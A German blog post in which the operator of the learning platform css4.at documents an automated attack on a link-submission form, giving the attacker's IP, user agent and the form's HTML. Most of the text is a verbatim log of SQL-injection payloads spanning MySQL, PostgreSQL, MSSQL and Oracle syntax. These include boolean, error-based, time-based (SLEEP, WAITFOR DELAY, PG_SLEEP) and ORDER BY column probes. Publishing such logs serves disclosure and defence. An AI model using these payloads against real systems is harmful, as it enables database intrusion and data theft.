Hackerangriff II auf www.css4.at
Wieder einmal ein Hackerangriff auf meine Lernplattform www.css4.at.
Der Angreifer verwendete die IP-Adresse: 147.78.47.37
Des weiteren hinterlies er noch folgende Informationen: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13.
Selbstverständlich weis ich nicht, ob der Angriff von einem Mann oder von einer Frau verursacht wurde. Beides ist durchaus denkbar und möglich.
Im konkreten Fall attackierte das fremde Script folgendes (stark verkürztes) Formular:
<form method="post" action="zueinerPHPDatei.php">
<input type="password" name="hyperlinkpasswort" id="hyperlinkpasswort" required placeholder="Passwort" ><br>
<input type="url" name="eingabeurl" id="eingabeurl" placeholder="http://..." required ><br>
<input type="text" name="eingabelinktext" id="eingabelinktext" placeholder="Beschreibung" ><br>
<button type="submit">Neuen Link freigeben</button>
</form>
Das Script übernahm unreflektiert für die Passwort-Eingabe im
Element id="hyperlinkpasswort" den placeholder Wert: Passwort.
Das Script kopierte für die Eingabe von id="eingabeurl" den placeholder Wert: http://....
Ebenso für id="eingabelinktext" verwendete das Script den placeholder Wert: Beschreibung.
Das Script steuerte die Eingaben in einem Inverval zwischen einer und fünf Sekunden.
Der Delay könnte aufgrund der Feedback Auswertung oder wegen einer per Zufallsgenerator gesteuert Eingabezeit erklärt werden.
Die erste Eingabe war ein Versuch nur die Placeholder-Werte zu verwenden und hatte folgendes Erscheinungsbild:
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung
Es folgen die weiteren Versuche eine SQL-Injection unterzubringen!
Im Quellcode ist der Original-String zu jeder Eingabe. Ausschließlich die Eckigen Klammern wurden escaped.
Viel Spass beim Lesen!
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...,(',.,."))
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...'KCYUEM<'">YrIVQV ← Eckige Klammern wurden manuell vom Author escaped
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...) AND 1798=8616 AND (2185=2185
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 6041=8633
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...') AND 1100=3828 AND ('ZvbS'='ZvbS
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...' AND 7378=3343 AND 'jGTX'='jGTX
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 8476=8541-- MSju
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: (SELECT (CASE WHEN (3464=3577) THEN 'http://...' ELSE (SELECT 3577 UNION SELECT 9198) END))
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...) AND EXTRACTVALUE(1118,CONCAT(0x5c,0x716a7a6271,(SELECT (ELT(1118=1118,1))),0x716b767671)) AND (6652=6652
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND EXTRACTVALUE(1118,CONCAT(0x5c,0x716a7a6271,(SELECT (ELT(1118=1118,1))),0x716b767671))
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...') AND EXTRACTVALUE(1118,CONCAT(0x5c,0x716a7a6271,(SELECT (ELT(1118=1118,1))),0x716b767671)) AND ('EJxi'='EJxi
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...' AND EXTRACTVALUE(1118,CONCAT(0x5c,0x716a7a6271,(SELECT (ELT(1118=1118,1))),0x716b767671)) AND 'FMLy'='FMLy
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND EXTRACTVALUE(1118,CONCAT(0x5c,0x716a7a6271,(SELECT (ELT(1118=1118,1))),0x716b767671))-- brPV
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...) AND 7722=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7722=7722) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)) AS NUMERIC) AND (8643=8643
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 7722=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7722=7722) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)) AS NUMERIC)
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: URL: http://...') AND 7722=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7722=7722) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)) AS NUMERIC) AND ('EWZJ'='EWZJ
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...' AND 7722=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7722=7722) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)) AS NUMERIC) AND 'KiYa'='KiYa
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 7722=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7722=7722) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)) AS NUMERIC)-- hPKP
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...) AND 5742 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5742=5742) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND (2119=2119
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 5742 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5742=5742) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113)))
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...') AND 5742 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5742=5742) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND ('ABml'='ABml
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...' AND 5742 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5742=5742) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'dayf'='dayf
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 5742 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5742=5742) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113)))-- rAbn
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...) AND 5539=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5539=5539) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND (2337=2337
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 5539=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5539=5539) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...') AND 5539=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5539=5539) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND ('hGpy'='hGpy
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...' AND 5539=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5539=5539) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'zgAO'='zgAO
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 5539=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5539=5539) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)-- ZiPy
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: (SELECT CONCAT(CONCAT('qjzbq',(CASE WHEN (4893=4893) THEN '1' ELSE '0' END)),'qkvvq'))
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...);SELECT PG_SLEEP(5)--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...;SELECT PG_SLEEP(5)--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...');SELECT PG_SLEEP(5)--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...';SELECT PG_SLEEP(5)--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...);WAITFOR DELAY '0:0:5'--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...;WAITFOR DELAY '0:0:5'--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...');WAITFOR DELAY '0:0:5'--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...';WAITFOR DELAY '0:0:5'--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(106)||CHR(74)||CHR(72),5) FROM DUAL--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(106)||CHR(74)||CHR(72),5) FROM DUAL--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(106)||CHR(74)||CHR(72),5) FROM DUAL--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(106)||CHR(74)||CHR(72),5) FROM DUAL--
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...) AND (SELECT 2840 FROM (SELECT(SLEEP(5)))thmC) AND (7923=7923
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND (SELECT 2840 FROM (SELECT(SLEEP(5)))thmC)
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...') AND (SELECT 2840 FROM (SELECT(SLEEP(5)))thmC) AND ('LRTP'='LRTP
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...' AND (SELECT 2840 FROM (SELECT(SLEEP(5)))thmC) AND 'nNzZ'='nNzZ
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND (SELECT 2840 FROM (SELECT(SLEEP(5)))thmC)-- QmNR
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...) AND 4394=(SELECT 4394 FROM PG_SLEEP(5)) AND (3263=3263
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 4394=(SELECT 4394 FROM PG_SLEEP(5))
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...') AND 4394=(SELECT 4394 FROM PG_SLEEP(5)) AND ('JHvs'='JHvs
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...' AND 4394=(SELECT 4394 FROM PG_SLEEP(5)) AND 'JYrb'='JYrb
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 4394=(SELECT 4394 FROM PG_SLEEP(5))-- plvA
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...) WAITFOR DELAY '0:0:5' AND (7670=7670
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... WAITFOR DELAY '0:0:5'
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...') WAITFOR DELAY '0:0:5' AND ('qovW'='qovW
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...' WAITFOR DELAY '0:0:5' AND 'CVab'='CVab
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... WAITFOR DELAY '0:0:5'-- XINm
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...) AND 5010=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(114)||CHR(81)||CHR(115),5) AND (3857=3857
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 5010=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(114)||CHR(81)||CHR(115),5)
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...') AND 5010=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(114)||CHR(81)||CHR(115),5) AND ('FQmp'='FQmp
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...' AND 5010=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(114)||CHR(81)||CHR(115),5) AND 'HtTa'='HtTa
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... AND 5010=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(114)||CHR(81)||CHR(115),5)-- rhzo
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...) ORDER BY 1-- DiKR
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...) ORDER BY 7131-- uiZy
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... ORDER BY 1-- oBRS
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... ORDER BY 5689-- foBu
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...') ORDER BY 7439-- WseJ
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...') ORDER BY 1-- nSyD
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...' ORDER BY 1-- HNXz
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...' ORDER BY 5274-- KnHH
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... ORDER BY 1-- uZNj
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://... ORDER BY 3732-- sALQ
Hyperlink Text: Beschreibung
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung',"))()(()
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung'pylWjX<'">sCUMvG ← Eckige Klammern wurden manuell vom Author escaped
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung') AND 9686=9845 AND ('okof'='okof
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung' AND 5928=1712 AND 'dqbG'='dqbG
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung) AND 2389=6241 AND (8696=8696
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung AND 6724=6881-- WPhT
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: (SELECT (CASE WHEN (8176=6603) THEN 'Beschreibung' ELSE (SELECT 6603 UNION SELECT 6749) END))
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung') AND EXTRACTVALUE(8942,CONCAT(0x5c,0x716a7a6271,(SELECT (ELT(8942=8942,1))),0x716b767671)) AND ('KWaC'='KWaC
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung' AND EXTRACTVALUE(8942,CONCAT(0x5c,0x716a7a6271,(SELECT (ELT(8942=8942,1))),0x716b767671)) AND 'DzSX'='DzSX
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung) AND EXTRACTVALUE(8942,CONCAT(0x5c,0x716a7a6271,(SELECT (ELT(8942=8942,1))),0x716b767671)) AND (8561=8561
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung AND EXTRACTVALUE(8942,CONCAT(0x5c,0x716a7a6271,(SELECT (ELT(8942=8942,1))),0x716b767671))
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung') AND 6617=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6617=6617) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)) AS NUMERIC) AND ('aOlu'='aOlu
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung AND EXTRACTVALUE(8942,CONCAT(0x5c,0x716a7a6271,(SELECT (ELT(8942=8942,1))),0x716b767671))-- eVXb
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung' AND 6617=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6617=6617) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)) AS NUMERIC) AND 'vyRk'='vyRk
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung) AND 6617=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6617=6617) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)) AS NUMERIC) AND (6699=6699
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung AND 6617=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6617=6617) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)) AS NUMERIC)
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung AND 6617=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6617=6617) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)) AS NUMERIC)-- DGTp
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung') AND 1948 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (1948=1948) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND ('qNzL'='qNzL
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung' AND 1948 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (1948=1948) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'QUes'='QUes
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung) AND 1948 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (1948=1948) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND (7688=7688
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung AND 1948 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (1948=1948) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113)))
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung AND 1948 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (1948=1948) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113)))-- rfaJ
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung') AND 3243=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (3243=3243) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND ('Sbbu'='Sbbu
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung' AND 3243=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (3243=3243) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'UANC'='UANC
Passwortversuch mit: Passwort
Hyperlink URL: http://...
Hyperlink Text: Beschreibung) AND 3243=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (3243=3243) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND (3978=3978